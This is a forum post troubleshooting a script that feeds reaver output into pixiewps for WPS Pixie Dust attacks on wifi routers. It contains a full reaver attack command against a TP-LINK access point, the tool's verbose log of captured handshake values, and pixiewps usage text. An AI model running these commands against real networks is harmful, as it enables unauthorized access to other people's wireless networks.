@mmusket33
I like the idea of your script to automatically try different data sets. I tried it out and it didnt parse the output from reaver correctly.
The E-Nouce, PKE were blank......... and it leaves out (-m, --r-nonce : Registrar nonce) - but all required data was in the reaver output
usuage command line:
reaver -i wlan2mon -b 00:00:00:00:A7:7C -m 00:00:00:00:2c:ee -vv -f -c6 -N -K1 -s y -A -t30 | tee /root/VARMAC_LOGS/TP-TP-LIN00000000
Code:
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire
[+] Switching wlan2mon to channel 6
[+] Waiting for beacon from 00:00:00:00:A7:7C
[+] Associated with 00:00:00:00:A7:7C (ESSID: TP-TP-LIN0000000)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: ba:18:d0:c0:0a:6f:9e:9e:02:48:74:3c:c4:17:8e:1a
[P] PKE: 8f:e6:47:0d:0c:c9:ee:9e:be:28:9b:c7:64:00:ed:b7:54:21:65:5d:c3:74:cb:9f:97:08:42:19:0e:b0:6a:da:91:41:97:1f:f0:79:1d:ae:d8:e3:9c:ac:10:cc:17:73:77:2a:d5:6b:68:d3:3c:85:9a:8d:ef:57:ce:bc:07:c2:7b:4b:24:f1:36:ea:0a:f7:50:b2:e4:24:89:38:99:df:b8:a9:5d:5b:29:b9:87:a7:59:72:3c:7a:6c:d7:da:88:b7:bb:4b:d9:97:08:b5:00:0c:c1:c3:96:8f:10:48:b8:5e:e6:e9:0e:0b:f4:2d:cf:4a:5a:bd:62:e3:27:1f:3e:13:93:ab:1a:b2:bd:bf:1f:41:d4:a5:4d:d9:a9:59:13:16:f0:d0:da:ad:a0:67:b4:34:27:f8:1a:85:4a:2e:a0:c0:b4:12:10:ba:54:d3:4f:ce:37:51:3f:72:f9:6d:99:d4:49:07:ca:13:2b:6f:41:bc:8a:c7:ac:bf:7b:14:58
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Name: TL-WR720N
[P] WPS Model Number: 1.0
[P] Access Point Serial Number: 1.0
[+] Received M1 message
[P] R-Nonce: 11:a4:d4:0f:5e:9e:dd:57:ae:12:5e:35:f2:49:43:18
[P] PKR: 19:6c:b3:0b:98:97:39:c2:3c:a3:f9:10:02:64:d9:07:61:23:7e:f4:71:c7:8f:c1:0e:a9:2c:47:fd:25:7b:61:92:f7:90:fe:05:60:d6:ae:3c:8e:44:60:9f:1e:50:37:e3:5e:e5:e2:fc:b0:59:5f:37:a7:54:1a:33:63:92:ce:96:6b:9a:dd:2e:8b:cd:86:c7:1c:da:ef:45:04:be:c9:b2:0e:cd:14:ad:12:24:25:fb:32:b7:65:40:28:29:f8:5d:98:29:1c:26:1b:6e:10:93:5b:7b:56:1d:4d:84:c9:0d:cb:49:ae:4f:4c:0b:5b:b8:16:80:6e:13:59:fc:52:84:f8:33:3a:49:ee:91:31:8a:a2:4e:1a:01:b2:42:3d:a1:1c:4a:64:33:ae:db:11:05:3c:39:d5:45:69:b4:b5:a6:42:6b:95:2f:3f:b6:07:26:cb:5c:4f:dc:7f:fd:b8:f2:84:6c:5e:23:c6:e0:fd:2e:1d:fa:0a:1f:51:e1:fa
[P] AuthKey: ad:4e:14:01:53:68:1f:c9:4b:bc:c7:7d:ab:96:08:2a:03:6d:dd:29:de:72:21:85:b0:08:a8:0b:bb:66:af:4b
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[P] E-Hash1: b6:9a:85:cb:6d:f9:67:b7:1f:00:9a:da:58:b7:60:ab:01:18:7e:92:5b:5a:43:64:49:6e:d9:32:46:1f:38:ff
[P] E-Hash2: ab:75:8b:80:2e:68:3f:d7:d3:01:b5:81:dc:d6:0a:1e:d4:f0:67:d1:6d:d3:0e:be:80:9a:8f:d7:17:87:ac:2d
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
PDDSA-05.sh output:
Code:
E-Nonce: =
E-BSSID: = 00:00:00:00:A7:7C
PKE: =
PKR: = 8e:8b:95:32:8b:63:02:72:29:fc:4a:60:6f:ba:63:42:e9:e3:f7:39:d3:86:fe:09:d7:94:22:48:5c:40:fd:17:54:f6:30:f5:ba:84:49:4e:34:fb:34:d8:44:c5:c9:ef:bf:e4:56:98:f8:0b:38:e4:00:39:b7:aa:75:6d:5a:77:fb:5a:eb:86:2c:86:f0:cd:44:fd:81:9d:b3:1f:e4:de:10:02:e2:02:40:f5:f3:72:ec:eb:b4:15:96:69:7a:54:ce:48:66:2a:5d:3b:6d:28:82:0c:f8:58:5f:71:31:79:45:72:a7:bd:15:89:46:ec:dc:c1:7f:a6:b5:aa:9a:51:8e:28:5d:4a:3e:87:27:f9:d9:e1:30:4e:44:aa:18:63:62:79:7e:a7:4f:85:9c:e7:5e:1d:ca:e5:81:e3:04:98:94:8c:3b:8c:b0:9c:4b:05:bb:99:3e:7b:86:19:f3:e6:e7:ae:64:be:d6:13:08:d0:9b:74:f4:b5:72:9b:62:8d
AuthKey: = 44:7a:30:93:b2:57:65:37:ed:9e:68:ce:32:68:f6:3f:6f:93:7d:cd:9c:01:fa:8a:17:0f:25:be:94:9c:fb:03
E-Hash1: = 96:0a:c7:fa:93:37:cd:7e:28:31:6f:a5:af:58:95:e7:28:ae:c4:54:75:62:de:8e:39:34:71:0a:ea:c4:91:bc
E-Hash2: = df:67:fb:4e:b9:bb:b6:0c:82:78:80:99:7c:bb:9f:a4:b2:4f:04:fd:e0:db:dd:32:ae:5b:f1:0a:7c:35:ae:c8
Pixiewps 1.1 WPS pixie dust attack tool
Copyright (c) 2015, wiire <[email protected]>
Usage: pixiewps <arguments>
Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : Enrollee Hash1
-z, --e-hash2 : Enrollee Hash2
-a, --authkey : Authentication session key
Optional Arguments:
-n, --e-nonce : Enrollee nonce (mode 2,3,4)
-m, --r-nonce : Registrar nonce
-b, --e-bssid : Enrollee BSSID
-S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]
-f, --force : Bruteforce the whole keyspace (mode 4) [No]
-v, --verbosity : Verbosity level 1-3, 1 is quietest [2]
-h, --help : Display this usage screen
Examples:
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
[!] Bad enrollee nonce -- --e-bssid
WPS Pin Not Found.
Pixie Dust Sequences Exhausted - ending program.
This was with repeated tries, in first try not posted here i used -P in reaver, in every set it left out PKE, and Enouce...no Rnouce
I'm happy to help beta, but you should probably make your thread to troubleshoot.